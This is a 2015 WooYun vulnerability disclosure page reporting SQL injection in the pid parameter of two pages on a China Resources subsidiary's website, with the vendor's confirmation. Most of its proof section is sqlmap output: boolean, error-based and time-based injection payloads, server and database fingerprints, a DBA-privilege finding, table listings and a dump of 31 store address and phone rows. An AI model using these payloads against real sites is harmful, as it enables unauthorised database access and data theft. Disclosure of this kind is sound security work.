当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134800

漏洞标题:华润集团麾下某公司网站存在SQL注入漏洞

相关厂商:华润五丰有限公司

漏洞作者: 路人甲

提交时间:2015-08-17 17:49

修复时间:2015-10-02 15:26

公开时间:2015-10-02 15:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-17: 细节已通知厂商并且等待厂商处理中
2015-08-18: 厂商已经确认,细节仅向厂商公开
2015-08-28: 细节向核心白帽子及相关领域专家公开
2015-09-07: 细节向普通白帽子公开
2015-09-17: 细节向实习白帽子公开
2015-10-02: 细节向公众公开

简要描述:

华润集团麾下某公司网站存在SQL注入漏洞。

详细说明:

注入点:

http://www.chinawufeng.com/cold.php?pid=13


http://www.chinawufeng.com/fast.php?pid=25


sqlmap identified the following injection point(s) with a total of 203 HTTP(s) requests:
---
Parameter: pid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=13' AND 9779=9779 AND 'KmPx'='KmPx
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: pid=13' AND (SELECT 8320 FROM(SELECT COUNT(*),CONCAT(0x7171767171,(SELECT (ELT(8320=8320,1))),0x7170627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eRRc'='eRRc
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: pid=13' AND SLEEP(5) AND 'WDGL'='WDGL
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.4.4
back-end DBMS: MySQL 5.0
available databases [6]:
[*] chinawufeng
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] wechat


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: pid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=13' AND 9779=9779 AND 'KmPx'='KmPx
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: pid=13' AND (SELECT 8320 FROM(SELECT COUNT(*),CONCAT(0x7171767171,(SELECT (ELT(8320=8320,1))),0x7170627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eRRc'='eRRc
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: pid=13' AND SLEEP(5) AND 'WDGL'='WDGL
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.4.4
back-end DBMS: MySQL 5.0
current user:    'root@localhost'
current user is DBA:    True
sqlmap resumed the following injection point(s) from stored session:
---

漏洞证明:

Parameter: pid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=13' AND 9779=9779 AND 'KmPx'='KmPx
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: pid=13' AND (SELECT 8320 FROM(SELECT COUNT(*),CONCAT(0x7171767171,(SELECT (ELT(8320=8320,1))),0x7170627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eRRc'='eRRc
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: pid=13' AND SLEEP(5) AND 'WDGL'='WDGL
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.4.4
back-end DBMS: MySQL 5.0
Database: chinawufeng
[18 tables]
+--------------------+
| lbcms_about        |
| lbcms_active       |
| lbcms_admin        |
| lbcms_applications |
| lbcms_buy          |
| lbcms_cdrink       |
| lbcms_channel      |
| lbcms_class        |
| lbcms_config       |
| lbcms_down         |
| lbcms_fast         |
| lbcms_field        |
| lbcms_rotpic       |
| lbcms_ticket       |
| ska_comments       |
| ska_users          |
| wtest_messagequeue |
| wtest_users        |
+--------------------+


--部分数据
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.4.4
back-end DBMS: MySQL 5.0
Database: chinawufeng
Table: lbcms_buy
[31 entries]
+--------------------------+---------+---------------+
| addr                     | content | phone         |
+--------------------------+---------+---------------+
| 三门光明路63#(东方百货旁)          | NULL    | 0576-83337177 |
| 上塘路772号(舟山路口公交站)         | NULL    | 0571-88282141 |
| 上虞百官街道横利新村西二区1幢101-102号  | NULL    | 0575-82135386 |
| 上陡门5组团4幢106-107号(人才大厦对面) | NULL    | 0577-88324633 |
| 下沙25号大街284号伊萨卡小区         | NULL    | 0571-86906576 |
| 下沙文苑风情2幢商铺2-3            | NULL    | 0571-86924476 |
| 东港二村                     | NULL    | 0512-67489177 |
| 东阳市双岘路128号               | NULL    | 0579-86637490 |
| 临安市石镜街699号               | NULL    | 0571-63961373 |
| 临平南兴路49号                 | NULL    | 0571-86220900 |
| 临平梅堰路12-3                | NULL    | 0571-86161512 |
| 临海市区水云北路129号             | NULL    | 0576-85156668 |
| 丽水中山街295号                | NULL    | 0578-2132716  |
| 丽水市大众路98号                | NULL    | 0578-2127834  |
| 丽水解放街306号                | NULL    | 0578-2151715  |
| 乐清市乐成镇建设西路103-105号       | NULL    | 0577-62557279 |
| 乐清市柳市镇后市街109号            | NULL    | 0577-62776269 |
| 乐清市虹桥镇虹河东路9号             | NULL    | 0577-62373340 |
| 乐购旁再行里42号(开元职高对面)        | NULL    | 0571-85372877 |
| 五台山路江都路交叉口云川农贸市场         | NULL    | 13082567358   |
| 体育场西路93号                 | NULL    | 0579-84137486 |
| 余姚市阳明东路213号              | NULL    | 0574-62681596 |
| 全坊巷43号                   | NULL    | 0577-88254176 |
| 北仑横河路196号                | NULL    | 0574-86833395 |
| 千岛湖镇南山大街605-607号         | NULL    | 0571-65067327 |
| 华星路211号(公益中学对面)          | NULL    | 0571-88930854 |
| 古河巷87-89号(锦绣新村10幢)       | NULL    | 0571-88063211 |
| 台州临海市台招路12号              | NULL    | 0576-85222190 |
| 台州市万昌中路323号              | NULL    | 0576-86028065 |
| 台州市椒江区东海大道542号           | NULL    | 0576-88518088 |
| 台州市椒江区岩屿路44-45号          | NULL    | 0576-88816517 |
+--------------------------+---------+---------------+

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-08-18 15:25

厂商回复:

感谢提交

最新状态:

暂无